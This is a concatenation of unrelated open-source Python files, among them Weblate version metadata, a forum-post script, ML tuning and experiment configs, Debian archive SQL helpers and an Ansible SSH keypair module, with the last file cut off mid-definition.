# # Copyright © 2012 - 2021 Michal Čihař <[email protected]> # # This file is part of Weblate <https://weblate.org/> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. # import os from collections import namedtuple from weblate.vcs.base import RepositoryException from weblate.vcs.git import GitRepository # This has to stay here for compatibility reasons - it is stored pickled in # the cache and moving it around breaks ugprades. Release = namedtuple("Release", ["version", "timestamp"]) def get_root_dir(): """Return Weblate root dir.""" curdir = os.path.dirname(os.path.abspath(__file__)) return os.path.abspath(os.path.join(curdir, "..", "..")) # Weblate version VERSION = "4.5.2-dev" # Version string without suffix VERSION_BASE = VERSION.replace("-dev", "") # User-Agent string to use USER_AGENT = f"Weblate/{VERSION}" # Git tag name for this release TAG_NAME = f"weblate-{VERSION_BASE}" # Grab some information from git try: # Describe current checkout GIT_REPO = GitRepository(get_root_dir(), local=True) GIT_VERSION = GIT_REPO.describe() GIT_REVISION = GIT_REPO.last_revision del GIT_REPO except (RepositoryException, OSError): # Import failed or git has troubles reading # repo (for example swallow clone) GIT_VERSION = VERSION GIT_REVISION = None
# Script to automatically create the text of the weekly post for the "poetry running contest" on the mtgsalvation forums. # using beautifulsoup4 (4.3.2) for this script from bs4 import BeautifulSoup from datetime import date, timedelta, datetime import urllib2 import argparse import sys import re from PRC_Forum_Tools import PRCForumTools class PRCNewRoundPost(PRCForumTools): def __init__(self): self.days, self.pages, self.output = self.parse_parameters() super(PRCNewRoundPost, self).__init__() print "Gathering Posts from up to < " + str(self.days.days) + " > days ago." print "Searching through last < " + str(self.pages) + " > pages of thread." print "Outputting post text to file: < " + self.output + " >" def parse_parameters(self): """ Script can accept the parameters: -w <num> --weeks <num> posts less then <num> weeks old will be used -p <num> --pages <num> posts from <num> thread pages back will be considered -o <str> --output <str> post text output will be written to file <str> number of weeks is returned as number of days by multiplying it by 7 """ parser = argparse.ArgumentParser() parser.add_argument("-w", "--weeks", type=int, default=1, choices=[1,2,3], help="Pull posts from <num> weeks back") parser.add_argument("-p", "--pages", type=int, default=2, choices=[1,2,3], help="Search <num> pages back in the thread for valid posts") parser.add_argument("-o", "--output", type=str, default="PRC_Post.txt", help="Write post output to <file> indicated here") args = parser.parse_args() return timedelta(days=args.weeks * 7), args.pages, args.output def get_thread_pages(self): """ Extracts the page link numbers from the thread. Use the page link numbers to determine the page number of the final thread page. If the user has requested searching more pages then the thread is long (through the -p or -pages parameter) then self.pages is just set to the length of the thread. Returns array of links to the thread pages that to search though. """ soup = self.get_url_contents(self.submission_thread_url) page_links = soup.find('ul', 'b-pagination-list').findAll('a', 'b-pagination-item') final_page_number = int(page_links[-1].contents[0]) if self.pages >= final_page_number: print "Thread does not contain " + str(pages) + " pages. Will perform search on all " + str(final_page_number) + " pages of the thread instead." self.pages = final_page_number return [(self.submission_thread_url + '?page=' + str(index)) for index in range(final_page_number + 1 - self.pages, final_page_number + 1)] def get_and_format_post_links(self, thread_pages): """ post_links is the array that will hold the links to posts (formatted as: '[URL="' + post_link + '"]' + post_title + '[/URL] by ' + poster_name + '\n') to be used for the new round post. present is a datetime object representing the current time. This will be compared with posts dates to determine whether to add a formatted link to that post to post_links. thread_pages is an array of links to the thread pages to search for posts. Search through each page in thread_pages for potential posts to add to post_links. For post on each page, attempt to get the posts date, this step might fail due to the issue described here: Site recently changed something... now there is some extra html for adds or something which are collected along with the valid posts. without the try except statement these cause error messages such as: "TypeError: 'NoneType' object has no attribute '__getitem__'" when it's failing this is the contents of post: <li class="p-comments p-comments-b"><section class="ad-container"><div class="ad-bin"><div class="ad-placement"></div></div></section></li> need to change the "thread_comments = soup.findAll('li', 'p-comments', 'p-comments-b')" line to somehow not grab those lines as posts If the post date is figured out successfully, make sure the post is recent enough to use, then get all the parts necessary for creating the formatted post link, then append to post_links. Returns post_links array. """ post_links = [] present = datetime.now() for page in thread_pages: soup = self.get_url_contents(page) thread_posts = soup.findAll('li', 'p-comments', 'p-comments-b') for post in thread_posts: try: post_date = self.get_post_date(post) except: continue if post_date >= (present - self.days): post_link = self.get_post_link(post) poster_name = self.get_poster_name(post) post_title = self.get_post_title(post) post_links.append('[URL="' + post_link + '"]' + post_title + '[/URL] by ' + poster_name + '\n') return post_links def write_post_to_file(self, post_links): """ Writing post to text file is for debugging purposes. Import the strings first_post_section, and final_post_section from prc_post_vars.py. These are in a separate file because they are ugly and should be kept hidden. post_links is an array of all the formatted links to the submitted poems. The the text to post will be written out to file self.output (defaults to "PRC_Post.txt"). The text written to the output file in this order: first_post_section, post_links, final_post_section. If some I/O error happens, it is written to std output. """ from prc_script_vars import first_post_section, final_post_section post_text = first_post_section + "".join(post_links).encode('utf8') + final_post_section post_text = unicode(post_text, errors="ignore") self.write_post_to_output(post_text) return post_text def main(self): """ Runs PrcScript class functions to create text to post for new PRC round. """ thread_pages = self.get_thread_pages() post_links = self.get_and_format_post_links(thread_pages) post_text = self.write_post_to_file(post_links) #print post_text #post_text = self.get_post_text() #post_text = unicode(post_text, errors="ignore") #print post_text self.create_and_submit_new_round_post(post_text) if __name__ == "__main__": run_script = PRCNewRoundPost() run_script.main()
# Example of tuning an SVR model in scikit-learn with Optunity # This example requires sklearn import math import itertools import optunity import optunity.metrics import sklearn.svm import matplotlib.pylab as plt import time # CREATE THE TRAINING SET from sklearn.datasets import load_diabetes diabetes = load_diabetes() n = diabetes.data.shape[0] data = diabetes.data targets = diabetes.target # we will use nested 3-fold cross-validation # in the outer cross-validation pmseedure # we make the decorator explicitly so we can reuse the same folds # in both tuned and untuned approaches outer_cv = optunity.cross_validated(x=data, y=targets, num_folds=3) # compute area under mse curve of default parameters def compute_mse_standard(x_train, y_train, x_test, y_test): model = sklearn.svm.SVR().fit(x_train, y_train) predictions = model.predict(x_test) return optunity.metrics.mse(y_test, predictions) # decorate with cross-validation compute_mse_standard = outer_cv(compute_mse_standard) mse_standard = compute_mse_standard() print('Nested cv mean squared error of non-tuned model: ' + str(mse_standard)) # compute area under mse curve with tuned parameters # we use 2x5 fold cross-validation while tuning def compute_mse_tuned(x_train, y_train, x_test, y_test): # define objective function @optunity.cross_validated(x=x_train, y=y_train, num_iter=2, num_folds=5) def tune_cv(x_train, y_train, x_test, y_test, C, gamma): model = sklearn.svm.SVR(C=C, gamma=gamma).fit(x_train, y_train) predictions = model.predict(x_test) return optunity.metrics.mse(y_test, predictions) # optimize parameters optimal_pars, _, _ = optunity.minimize(tune_cv, 200, C=[0, 10], gamma=[0, 10], pmap=optunity.pmap) # if you are running this in IPython, optunity.pmap will not work # more info at: https://github.com/claesenm/optunity/issues/8 # comment out the above line and replace by the one below: # optimal_pars, _, _ = optunity.minimize(inner_cv, 150, C=[0, 10], gamma=[0, 0.1]) tuned_model = sklearn.svm.SVR(**optimal_pars).fit(x_train, y_train) predictions = tuned_model.predict(x_test) return optunity.metrics.mse(y_test, predictions) # decorate with cross-validation compute_mse_tuned = outer_cv(compute_mse_tuned) t = time.time() mse_tuned = compute_mse_tuned() diff = time.time() - t print('Nested cv mean squared error of tuned model: ' + str(mse_tuned)) print('Tuning time (approx): ' + str(diff/3) + ' seconds') # we tuned 3 times # generate folds, so we know the indices of test instances at any point folds = optunity.generate_folds(data.shape[0], num_folds=3) # create another cross-validation decorator # we will compare nested cross-validation results for both tuned and untuned models # to do this, we will perform nested cross-validation but aggregate results using the identity function # this will yield the predictions outer_cv = optunity.cross_validated(x=data, y=targets, num_folds=3, folds=[folds], aggregator=optunity.cross_validation.identity) def svr_untuned_predictions(x_train, y_train, x_test, y_test): model = sklearn.svm.SVR().fit(x_train, y_train) return model.predict(x_test).tolist() def svr_tuned_predictions(x_train, y_train, x_test, y_test): @optunity.cross_validated(x=x_train, y=y_train, num_iter=2, num_folds=5) def tune_cv(x_train, y_train, x_test, y_test, C, gamma): model = sklearn.svm.SVR(C=C, gamma=gamma).fit(x_train, y_train) predictions = model.predict(x_test) return optunity.metrics.mse(y_test, predictions) optimal_pars, _, _ = optunity.minimize(tune_cv, 200, C=[0, 20], gamma=[0, 10], pmap=optunity.pmap) tuned_model = sklearn.svm.SVR(**optimal_pars).fit(x_train, y_train) return tuned_model.predict(x_test).tolist() svr_untuned_predictions = outer_cv(svr_untuned_predictions) svr_tuned_predictions = outer_cv(svr_tuned_predictions) untuned_preds = svr_untuned_predictions() tuned_preds = svr_tuned_predictions() true_targets = [targets[i] for i in itertools.chain(*folds)] untuned = list(itertools.chain(*untuned_preds)) tuned = list(itertools.chain(*tuned_preds)) #for y, u, t in zip(true_targets, untuned, tuned): # print(str(y) + ' :: ' + str(u) + ' :: ' + str(t)) print('plotting results') plt.plot(range(len(true_targets)), sorted(map(lambda x, y: math.fabs(x-y), tuned, true_targets)), 'b') plt.plot(range(len(true_targets)), sorted(map(lambda x, y: math.fabs(x-y), untuned, true_targets)), 'r') plt.xlabel('k largest error') plt.ylabel('absolute error') plt.legend(['tuned model', 'default hyperparameters']) plt.show()
#!/usr/bin/python """ Helper functions for list generating commands (Packages, Sources). @contact: Debian FTP Master <[email protected]> @copyright: 2009-2011 Torsten Werner <[email protected]> @license: GNU General Public License version 2 or later """ # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ################################################################################ from dbconn import get_architecture def fetch(query, args, session): for (id, path, filename) in session.execute(query, args).fetchall(): yield (id, path + filename) def getSources(suite, component, session, timestamp = None): ''' Calculates the sources in suite and component optionally limited by sources newer than timestamp. Returns a generator that yields a tuple of source id and full pathname to the dsc file. See function writeSourceList() in dak/generate_filelist.py for an example that uses this function. ''' extra_cond = "" if timestamp: extra_cond = "AND extract(epoch from sa.created) > %d" % timestamp query = """ SELECT s.id, archive.path || '/pool/', c.name || '/' || f.filename FROM source s JOIN src_associations sa ON s.id = sa.source AND sa.suite = :suite %s JOIN suite ON sa.suite = suite.id JOIN archive ON suite.archive_id = archive.id JOIN files f ON s.file = f.id JOIN files_archive_map fam ON fam.file_id = f.id AND fam.component_id = :component JOIN component c ON fam.component_id = c.id ORDER BY filename """ % extra_cond args = { 'suite': suite.suite_id, 'component': component.component_id } return fetch(query, args, session) def getArchAll(suite, component, architecture, type, session, timestamp = None): ''' Calculates all binaries in suite and component of architecture 'all' (and only 'all') and type 'deb' or 'udeb' optionally limited to binaries newer than timestamp. Returns a generator that yields a tuple of binary id and full pathname to the u(deb) file. See function writeAllList() in dak/generate_filelist.py for an example that uses this function. ''' query = suite.clone(session).binaries. \ filter_by(architecture = architecture, binarytype = type) if timestamp is not None: extra_cond = 'extract(epoch from bin_associations.created) > %d' % timestamp query = query.filter(extra_cond) for binary in query: yield (binary.binary_id, binary.poolfile.fullpath) def getBinaries(suite, component, architecture, type, session, timestamp = None): ''' Calculates the binaries in suite and component of architecture and type 'deb' or 'udeb' optionally limited to binaries newer than timestamp. Returns a generator that yields a tuple of binary id and full pathname to the u(deb) file. See function writeBinaryList() in dak/generate_filelist.py for an example that uses this function. ''' extra_cond = "" if timestamp: extra_cond = "AND extract(epoch from ba.created) > %d" % timestamp query = """ CREATE TEMP TABLE b_candidates ( id integer, source integer, file integer, architecture integer); INSERT INTO b_candidates (id, source, file, architecture) SELECT b.id, b.source, b.file, b.architecture FROM binaries b JOIN bin_associations ba ON b.id = ba.bin WHERE b.type = :type AND ba.suite = :suite AND b.architecture IN (:arch_all, :architecture) %s; CREATE TEMP TABLE gf_candidates ( id integer, filename text, path text, architecture integer, src integer, source text); INSERT INTO gf_candidates (id, filename, path, architecture, src, source) SELECT bc.id, c.name || '/' || f.filename, archive.path || '/pool/' , bc.architecture, bc.source as src, s.source FROM b_candidates bc JOIN source s ON bc.source = s.id JOIN files f ON bc.file = f.id JOIN files_archive_map fam ON f.id = fam.file_id JOIN component c ON fam.component_id = c.id JOIN archive ON fam.archive_id = archive.id JOIN suite ON suite.archive_id = archive.id WHERE c.id = :component AND suite.id = :suite; WITH arch_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture <> :arch_all), arch_all_with_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture = :arch_all AND src IN (SELECT src FROM gf_candidates WHERE architecture <> :arch_all)), arch_all_without_any AS (SELECT id, path, filename FROM gf_candidates WHERE architecture = :arch_all AND source NOT IN (SELECT DISTINCT source FROM gf_candidates WHERE architecture <> :arch_all)), filelist AS (SELECT * FROM arch_any UNION SELECT * FROM arch_all_with_any UNION SELECT * FROM arch_all_without_any) SELECT * FROM filelist ORDER BY filename """ % extra_cond args = { 'suite': suite.suite_id, 'component': component.component_id, 'architecture': architecture.arch_id, 'arch_all': get_architecture('all', session).arch_id, 'type': type } return fetch(query, args, session)
from open_municipio.votations.models import ChargeVote from open_municipio.acts.models import Deliberation as OMDeliberation import os from django.conf import settings MUNICIPALITY_NAME = 'Senigallia' # starting year (as a 'YYYY' string) of the municipality's current legislature MUNICIPALITY_CURRENT_LEGISLATURE = '2008' # where MDB files are located on the filesystem MDB_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/mdb') # where CSV files are located on the filesystem CSV_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/csv') # a regexp describing valid filenames for MDB files containing votation-related data MDB_SITTING_FNAME_PATTERN = r'UdinSCN(?P<sitting_id>\d{4})\.Mdb' # name of the MDB file containing data about people taking part to City Council's sittings MDB_COMPONENT_FNAME = 'UdinC%(current_legislature)s.Mdb' % {'current_legislature': MUNICIPALITY_CURRENT_LEGISLATURE} # where XML files are located on the filesystem XML_ROOT_DIR = os.path.join(settings.REPO_ROOT, 'test_data/votations/xml') ACTS_PEOPLE_FILE = os.path.join(settings.REPO_ROOT, 'test_data/acts/people.xml') # Django settings specific for the data import features XML_TO_OM_STATUS = { 'Accepted' : "APPROVED", 'Rejected' : "REJECTED", 'Presented' : "PRESENTED", } XML_TO_OM_INST = { 'SCN' : 'Consiglio comunale', 'C02' : '1^ commissione', 'C03' : '2^ commissione', 'C04' : '3^ commissione', 'C05' : '4^ commissione', 'C06' : '5^ commissione', 'C07' : '6^ commissione', } # mappings of the possible vote types XML_TO_OM_VOTE = { 'FAV' : ChargeVote.VOTES.yes, 'CON' : ChargeVote.VOTES.no, 'AST' : ChargeVote.VOTES.abstained, 'VOT' : ChargeVote.VOTES.secret, 'NVT' : ChargeVote.VOTES.canceled, 'PRE' : ChargeVote.VOTES.pres, '...' : ChargeVote.VOTES.absent, '___' : None, 'ECP' : ChargeVote.VOTES.untracked, 'ETP' : ChargeVote.VOTES.untracked, 'ELE' : ChargeVote.VOTES.untracked, 'ELG' : ChargeVote.VOTES.untracked, 'EFW' : ChargeVote.VOTES.untracked, 'ENR' : ChargeVote.VOTES.untracked, 'BDO' : ChargeVote.VOTES.untracked, 'EAB' : ChargeVote.VOTES.untracked, 'EPO' : ChargeVote.VOTES.untracked } XML_TO_OM_INITIATIVE = { 'mayor' : 'mayor', 'council_president': 'counselor', 'council_member' : 'counselor', 'alderman' : 'assessor', } OBJ_TO_OM_ACTS = { "CouncilDeliberation" : "open_municipio.acts.models.Deliberation", } VOTE_PROVIDER = None # to be specified in your municipality configuration ACTS_PROVIDER = None
"""Restructure data. As the original data has shuffled the data randomly, therefore it's difficult to reconstruct the exact path. Here we manually select the necessary data from raw data. Author: Yuhuang Hu Email : [email protected] """ from __future__ import print_function import os import numpy as np import rlvision import rlvision.utils as utils from rlvision.grid import GridDataSampler # import data db, imsize = utils.load_grid40(split=3) # let's have a look at data im_data = db['im_data'] value_data = db['value_data'] states = db['state_xy_data'] label_data = db['label_data'] print ("[MESSAGE] DATA LOADED") grid_sampler = GridDataSampler(im_data, value_data, imsize, states, label_data) print ("[MESSAGE] SAMPLER READY") grid, value, start_pos_list, pos_traj, goal_pos = grid_sampler.next() print (grid) print (value) print (start_pos_list) print (pos_traj) print (goal_pos) # i = 0 # while grid_sampler.grid_available: # print ("[MESSAGE] SAMPLING NEW GRID..") # grid, value, start_pos_list, pos_traj, goal_pos = grid_sampler.next() # i += 1 # print ("[MESSAGE] THE %i-TH GRID SAMPLED. %i PATH FOUND." % # (i, len(start_pos_list))) # print (i) # states_xy = [] # for i in xrange(100): # grid = np.reshape(im_data[i], imsize) # value = np.reshape(value_data[i], imsize) # goal_list = np.where(value == value.max()) # # assume the first one # goal_pos = (goal_list[0][0], goal_list[1][0]) # states_xy.append((states[i][0], states[i][1])) # # utils.plot_grid(grid, imsize, states_xy, goal_pos, title=str(i))
# -*- coding: utf-8 -*- # Copyright 2015 Objectif Libre # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # import collections from django.conf import settings from horizon.utils.memoized import memoized # noqa from keystoneauth1.identity.v3 import Token from cloudkittyclient import client as ck_client from cloudkittydashboard import utils @memoized def cloudkittyclient(request): """Initialization of Cloudkitty client.""" cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None) insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False) auth_url = getattr(settings, 'OPENSTACK_KEYSTONE_URL', None) auth = Token( auth_url, token=request.user.token.id, project_id=request.user.project_id, domain_id=request.user.domain_id, ) adapter_options = { 'region_name': request.user.services_region, } return ck_client.Client( '1', auth=auth, cacert=cacert, insecure=insecure, adapter_options=adapter_options, ) def identify(what, name=False, key=None): if isinstance(what, collections.Iterable): for i in what: i['id'] = i.get(key or "%s_id" % i['key']) if name and not i.get('name'): i['name'] = i.get(key or "%s_id" % i['key']) what = [utils.TemplatizableDict(i) for i in what] else: what['id'] = what.get(key or "%s_id" % what['key']) if name and not i.get('name'): what['name'] = what.get(key or "%s_id" % what['key']) what = utils.TemplatizableDict(what) return what
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2018, David Kainz <[email protected]> <[email protected]> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { 'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community' } DOCUMENTATION = ''' --- module: openssh_keypair author: "David Kainz (@lolcube)" version_added: "2.8" short_description: Generate OpenSSH private and public keys. description: - "This module allows one to (re)generate OpenSSH private and public keys. It uses ssh-keygen to generate keys. One can generate C(rsa), C(dsa), C(rsa1), C(ed25519) or C(ecdsa) private keys." requirements: - "ssh-keygen" options: state: required: false default: present choices: [ present, absent ] description: - Whether the private and public keys should exist or not, taking action if the state is different from what is stated. size: required: false description: - "Specifies the number of bits in the private key to create. For RSA keys, the minimum size is 1024 bits and the default is 4096 bits. Generally, 2048 bits is considered sufficient. DSA keys must be exactly 1024 bits as specified by FIPS 186-2. For ECDSA keys, size determines the key length by selecting from one of three elliptic curve sizes: 256, 384 or 521 bits. Attempting to use bit lengths other than these three values for ECDSA keys will cause this module to fail. Ed25519 keys have a fixed length and the size will be ignored." type: required: false default: rsa choices: ['rsa', 'dsa', 'rsa1', 'ecdsa', 'ed25519'] description: - "The algorithm used to generate the SSH private key. C(rsa1) is for protocol version 1. C(rsa1) is deprecated and may not be supported by every version of ssh-keygen." force: required: false default: false type: bool description: - Should the key be regenerated even if it already exists path: required: true description: - Name of the files containing the public and private key. The file containing the public key will have the extension C(.pub). comment: required: false description: - Provides a new comment to the public key. When checking if the key is in the correct state this will be ignored. extends_documentation_fragment: files ''' EXAMPLES = ''' # Generate an OpenSSH keypair with the default values (4096 bits, rsa) - openssh_keypair: path: /tmp/id_ssh_rsa # Generate an OpenSSH rsa keypair with a different size (2048 bits) - openssh_keypair: path: /tmp/id_ssh_rsa size: 2048 # Force regenerate an OpenSSH keypair if it already exists - openssh_keypair: path: /tmp/id_ssh_rsa force: True # Generate an OpenSSH keypair with a different algorithm (dsa) - openssh_keypair: path: /tmp/id_ssh_dsa type: dsa ''' RETURN = ''' size: description: Size (in bits) of the SSH private key returned: changed or success type: int sample: 4096 type: description: Algorithm used to generate the SSH private key returned: changed or success type: string sample: rsa filename: description: Path to the generated SSH private key file returned: changed or success type: string sample: /tmp/id_ssh_rsa fingerprint: description: The fingerprint of the key. returned: changed or success type: string sample: 4096 SHA256:r4YCZxihVjedH2OlfjVGI6Y5xAYtdCwk8VxKyzVyYfM [email protected] (RSA) ''' import os import errno from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native class KeypairError(Exception): pass class Keypair(object): def __init__(self, module): self.path = module.params['path'] self.state = module.params['state'] self.force = module.params['force'] self.size = module.params['size'] self.type = module.params['type'] self.comment = module.params['comment'] self.changed = False self.check_mode = module.check_mode self.privatekey = None self.fingerprint = {} if self.type in ('rsa', 'rsa1'): self.size = 4096 if self.size is None else self.size if self.size < 1024: module.fail_json(msg=('For RSA keys, the minimum size is 1024 bits and the default is 4096 bits. ' 'Attempting to use bit lengths under 1024 will cause the module to fail.')) if self.type == 'dsa': self.size = 1024 if self.size is None else self.size if self.size != 1024: module.fail_json(msg=('DSA keys must be exactly 1024 bits as specified by FIPS 186-2.')) if self.type == 'ecdsa': self.size = 256 if self.size is None else self.size if self.size not in (256, 384, 521): module.fail_json(msg=('For ECDSA keys, size determines the key length by selecting from ' 'one of three elliptic curve sizes: 256, 384 or 521 bits. ' 'Attempting to use bit lengths other than these three values for ' 'ECDSA keys will cause this module to fail. ')) if self.type == 'ed25519': self.size = 256 def generate(self, module): # generate a keypair if not self.isValid(module, perms_required=False) or self.force: args = [ module.get_bin_path('ssh-keygen', True), '-q', '-N', '', '-b', str(self.size), '-t', self.type, '-f', self.path, ] if self.comment: args.extend(['-C', self.comment]) else: args.extend(['-C', ""]) try: self.changed = True module.run_command(args) proc = module.run_command([module.get_bin_path('ssh-keygen', True), '-lf', self.path]) self.fingerprint = proc[1].split() except Exception as e: self.remove() module.fail_json(msg="%s" % to_native(e)) file_args = module.load_file_common_arguments(module.params) if module.set_fs_attributes_if_different(file_args, False): self.changed = True def isValid(self, module, perms_required=True): # check if the key is correct def _check_state(): return os.path.exists(self.path) if _check_state(): proc = module.run_command([module.get_bin_path('ssh-keygen', True), '-lf', self.path]) fingerprint = proc[1].split() keysize = int(fingerprint[0]) keytype = fingerprint[-1][1:-1].lower() else: return False def _check_perms(module): file_args = module.load_file_common_arguments(module.params) return not module.set_fs_attributes_if_different(file_args, False) def _check_type(): return self.type == keytype def _check_size(): return self.size == keysize self.fingerprint = fingerprint if not perms_required: return _check_state() and _check_type() and _check_size() return _check_state() and _check_perms(module) and _check_type() and _check_size() def dump(self): # return result as a dict """Serialize the object into a dictionary.""" result = { 'changed': self.changed, 'size': self.size, 'type': self.type, 'filename': self.path, 'fingerprint': self.fingerprint, } return result def remove(self): """Remove the resource from the filesystem.""" try: os.remove(self.path) self.changed = True except OSError as exc: if exc.errno != errno.ENOENT: raise KeypairError(exc) else: pass if os.path.exists(self.path + ".pub"): try: os.remove(self.path + ".pub") self.changed = True except OSError as exc: if exc.errno != errno.ENOENT: raise KeypairError(exc) else: pass def main(): # Define Ansible Module module = AnsibleModule( argument_spec=dict( state=dict(default='present', choices=['present', 'absent'], type='str'), size=dict(type='int'), type=dict(default='rsa', choices=['rsa', 'dsa', 'rsa1', 'ecdsa', 'ed25519'], type='str'), force=dict(default=False, type='bool'), path=dict(required=True, type='path'), comment=dict(type='str'), ), supports_check_mode=True, add_file_common_args=True, ) # Check if Path exists base_dir = os.path.dirname(module.params['path']) if not os.path.isdir(base_dir): module.fail_json( name=base_dir, msg='The directory %s does not exist or the file is not a directory' % base_dir ) keypair = Keypair(module) if keypair.state == 'present': if module.check_mode: result = keypair.dump() result['changed'] = module.params['force'] or not keypair.isValid(module) module.exit_json(**result) try: keypair.generate(module) except Exception as exc: module.fail_json(msg=to_native(exc)) else: if module.check_mode: keypair.changed = os.path.exists(module.params['path']) if keypair.changed: keypair.fingerprint = {} result = keypair.dump() module.exit_json(**result) try: keypair.remove() except Exception as exc: module.fail_json(msg=to_native(exc)) result = keypair.dump() module.exit_json(**result) if __name__ == '__main__': main()
from __future__ import print_function, division import matplotlib matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab! from neuralnilm import Net, RealApplianceSource, BLSTMLayer, SubsampleLayer, DimshuffleLayer from lasagne.nonlinearities import sigmoid, rectify from lasagne.objectives import crossentropy, mse from lasagne.init import Uniform, Normal from lasagne.layers import LSTMLayer, DenseLayer, Conv1DLayer, ReshapeLayer from lasagne.updates import adagrad, nesterov_momentum from functools import partial import os from neuralnilm.source import standardise from neuralnilm.experiment import run_experiment from neuralnilm.net import TrainingError import __main__ NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0] PATH = "/homes/dk3810/workspace/python/neuralnilm/figures" SAVE_PLOT_INTERVAL = 250 GRADIENT_STEPS = 100 """ e103 Discovered that bottom layer is hardly changing. So will try just a single lstm layer e104 standard init lower learning rate e106 lower learning rate to 0.001 e108 is e107 but with batch size of 5 e109 Normal(1) for LSTM e110 * Back to Uniform(5) for LSTM * Using nntools eb17bd923ef9ff2cacde2e92d7323b4e51bb5f1f """ def exp_a(name): source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.1), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def exp_b(name): # as above but without gradient_steps source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.1), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5) }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def exp_c(name): # Same as above but with learning rate = 0.01 source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 2500, 2400], on_power_thresholds=[20, 20, 20], #, 20, 20], max_input_power=1000, min_on_durations=[60, 60, 60], #, 1800, 1800], window=("2013-06-01", "2014-07-01"), seq_length=1000, output_one_appliance=False, boolean_targets=False, min_off_duration=60, train_buildings=[1], validation_buildings=[1], skip_probability=0, n_seq_per_batch=5 ) net = Net( experiment_name=name, source=source, save_plot_interval=SAVE_PLOT_INTERVAL, loss_function=crossentropy, updates=partial(nesterov_momentum, learning_rate=0.01), layers_config=[ { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(25), 'W': Uniform(25) }, { 'type': DenseLayer, 'num_units': 50, 'nonlinearity': sigmoid, 'b': Uniform(10), 'W': Uniform(10) }, { 'type': LSTMLayer, 'num_units': 50, 'W_in_to_cell': Uniform(5), 'gradient_steps': GRADIENT_STEPS }, { 'type': DenseLayer, 'num_units': source.n_outputs, 'nonlinearity': sigmoid } ] ) return net def exp_d(name): # Same as above but with learning rate = 0.001 source = RealApplianceSource( filename='/data/dk3810/ukdale.h5', appliances=[ ['fridge freezer', 'fridge', 'freezer'], 'hair straighteners', 'television' # 'dish washer', # ['washer dryer', 'washing machine'] ], max_appliance_powers=[300, 500, 200], #, 